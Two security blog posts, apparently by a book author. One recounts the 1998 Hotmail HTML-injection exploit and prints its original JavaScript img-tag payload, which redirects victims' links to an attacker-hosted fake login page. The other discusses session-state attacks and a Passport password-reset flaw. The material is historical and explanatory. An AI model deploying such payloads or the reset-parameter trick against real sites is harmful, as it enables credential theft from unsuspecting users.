My book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed.

Consider the following example, over a decade old, of HTML injection before the term XSS became so ubiquitous. The exploit also appeared about two years before the blanket CERT advisory that called attention to the insecurity of unchecked HTML (CA-2000-02)¹.

On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed:

We have just found a serious security hole in Microsoft’s Hotmail service (https://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users.

The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

The discoverers flouted the 90s trend to name vulns based on expletives or num3r1c characters and dubbed it simply the “Hot”Mail Exploit.

Disclosures of that era also tended to include greetz, typos, and self-aggrandizement about the hacker’s near-omnipotent skills. This disclosure skipped those aspects. However, the demo site satisfied an axiom of hacking culture by using a hacker handle that referenced pop culture, Blue Adept, a fantasy novel by Piers Anthony.

The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was subsumed by the Web 2.0 label) that spoofed Hotmail’s login.

The attack wasn’t particularly sophisticated and it didn’t need to be. The login form collected the victim’s credentials and IP address, then mailed them to the newly-created Geocities account.

The second step involved executing the exploit against Hotmail by sending an email with HTML that contained a rather curious img tag. (Whitespace added for readability of the long, double-quoted string.):

<img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
  top.submenu.document.links[i].target='work';
  top.submenu.document.links[i].href=errurl;
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
  top.work.document.links[i].target='work';
  top.work.document.links[i].href=errurl;
}">

The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point it would coax credentials from an unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute.

Modern attacks might have more sophisticated obfuscation techniques and use tags other than the img element, but it’s otherwise hard to distinguish what decade this payload is from.

What’s also entertaining is how timeless the “serious security concern” is from the original disclosure. They list four points, which I’ve only edited for a typo:

1. The malicious code runs as soon as e-mail message is viewed
2. The resources required to launch the attack are minimal and freely available.
3. The malicious e-mail can be sent from virtually anywhere, including libraries, internet cafes, or classroom terminals
4. The exploit will work with any javascript-enabled browser, …

The reference to internet cafes gives away the era, but otherwise this description from 1998 sounds like it could be from today. (I also have an example from 1996.)

The problem of HTML injection, well known for over 10 years, remains a common vuln.

(Another edit from the future: XSS still remains a common vuln 25 years after this disclosure. Although I’m optimistic about its decline due to frameworks like React.)

Sit and listen to Pink Floyd’s album, Wish You Were Here.

Can you tell a green field from a cold steel rail?

Yes? Could you tell a buffer overflow from a valid username in a web app? Yes again. What about SQL injection, cross-site scripting, directory traversal attacks, or appending “.bak” to every file? Once again: Yes.

Many of these attacks have common signatures that could be thrown into Snort or passed through a simple grep command when examining log files. These are the vulns that are reported most often on sites like www.cgisecurity.com or www.securityfocus.com. They pop up for good reason – they’re dangerous and can undermine an app.

On the other hand, a different category of attacks has not yet crept far enough into the awareness of security admins and developers – session attacks. There are several reasons for this relative obscurity. No automated tool does a proper job of identifying session vulns without customization to the app. There are no defined signatures to try, as opposed to the simpler single quote insertion for a SQL injection test. Most importantly, session state vulns vary significantly between apps.

The consequence of session attacks is no less severe than a good SQL injection that hits xp_cmdshell. Consider last May’s Passport advisory in which an attacker could harvest passwords with tools no more sophisticated than a browser. The attack relies on selecting proper values for the em (victim’s email) and prefem (attacker’s email) parameters to the emailpwdreset.srf page. It should really be stressed that nowhere in this attack were invalid characters sent to the server. Both parameters were attacked, but the payload contained valid email addresses -– not email addresses with single quotes, long strings, Unicode encoded characters, or other nefarious items.

The attack succeeded for two major reasons. The email addresses are exposed to the client, rather than tracked on the server in a session object. The four steps ostensibly required for a user to complete the password reminder process did not have to be performed in sequential order, which demonstrates lack of a strong state mechanism.

It seems that most buffer overflow-style attacks against operating systems or Internet servers such as IIS or Apache have led to site defacements or denial of service attacks. Yet as e-commerce has grown, so have the vulns moved on from buffer overflows. Plus, attacks no longer just stick to site defacement, but have moved into identity or financial theft. Attacks that used to primarily affect only the site’s owners (and perhaps annoy users who can’t access the site for a while) now include more that directly affect users.

As admins and devs, we need to be aware of all the vulns that crop up in apps -– not just the easy (yet still important!) ones that currently populate the web vuln encyclopedia.

This was originally posted in July 2003 on the now-defunct vulns.com. Even several years later when I re-published it on the blog in 2008, no web app scanner could automatically identify such vulns in a reliable, accurate manner. Now 20 years later in 2023, many vulns still require human analysis.